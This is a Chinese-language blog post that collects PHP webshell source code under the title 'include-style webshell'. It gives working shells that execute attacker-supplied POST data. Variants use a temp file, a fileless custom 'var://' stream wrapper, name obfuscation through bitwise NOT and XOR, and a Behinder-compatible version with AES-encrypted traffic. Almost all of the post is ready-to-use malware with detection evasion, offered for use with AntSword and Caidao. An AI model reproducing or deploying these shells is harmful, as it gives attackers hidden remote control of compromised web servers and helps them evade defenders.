include方式webshell

写文件include

1
2
3
4
//来源于网络
<?php
(~urldecode("%99%96%93%9A%A0%8F%8A%8B%A0%9C%90%91%8B%9A%91%8B%8C"))('temp.php','<?php '.$_POST[a].' ?>');include('temp.php');
?>
1
2
3
4
5
6
7
//来源于网络
<?php
$file = fopen("temp.php","w");
echo fwrite($file,"<?php ".$_POST[a].' ?>');
fclose($file);
include('temp.php');
?>

无文件落地include

通用蚁剑菜刀等

使用自定义协议将传入字符串当作文件include,无需写入文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$user="<?php ".$_POST[a].' ?>';
class VStream {
    private $string;
    private $position;
    public function stream_open($path, $mode, $options, &$opened_path) {
    $url = parse_url($path);
    $id = $url["host"];
        global $$id;
    $this->string = $$id;
    $this->position = 0;
    return true;
    }
    public function stream_read($count) {
    $ret = substr($this->string, $this->position, $count);
    $this->position += strlen($ret);
    return $ret;
    }
    public function stream_eof() {}
    public function stream_stat() {}
    }
        stream_wrapper_register("var", "VStream");
        include("var://user");
?>

进一步去除post特征并将流量b64编码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php
function AtgI(){
        $_1='_'.chr(51^99).chr(93^18).chr(70^21).chr(39^115);
        return $_1;
}
$params = strrev(edoced_46esab)(${AtgI()}[a]);
$user="<?php ".$params.' ?>';
class VStream {
    private $string;
    private $position;
    public function stream_open($path, $mode, $options, &$opened_path) {
    $url = parse_url($path);
    $id = $url["host"];
        global $$id;
    $this->string = $$id;
    $this->position = 0;
    return true;
    }
    public function stream_read($count) {
    $ret = substr($this->string, $this->position, $count);
    $this->position += strlen($ret);
    return $ret;
    }
    public function stream_eof() {}
    public function stream_stat() {}
    }
        stream_wrapper_register("var", "VStream");
        include("var://user");
?>

behinder

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
<?php
@error_reporting(0);
session_start();
    $key="dd42f170a6074880";
        $_SESSION['k']=$key;
        session_write_close();
        $post=file_get_contents("php://input");
        if(!extension_loaded('openssl'))
        {
                $t="base64_"."decode";
                $post=$t($post."");

                for($i=0;$i<strlen($post);$i++) {
                         $post[$i] = $post[$i]^$key[$i+1&15];
                        }
        }
        else
        {
                $post=openssl_decrypt($post, "AES128", $key);
        }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];

        $user='<?php @'.$params;
        class VStream {
    private $string;
    private $position;
    public function stream_open($path, $mode, $options, &$opened_path) {
    $url = parse_url($path);
    $id = $url["host"];
        global $$id;
    $this->string = $$id;
    $this->position = 0;
    return true;
    }
    public function stream_read($count) {
    $ret = substr($this->string, $this->position, $count);
    $this->position += strlen($ret);
    return $ret;
    }
    public function stream_eof() {}
    public function stream_stat() {}
    }
        stream_wrapper_register("var", "VStream");
        include("var://user");
?>
webshell
webshell

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!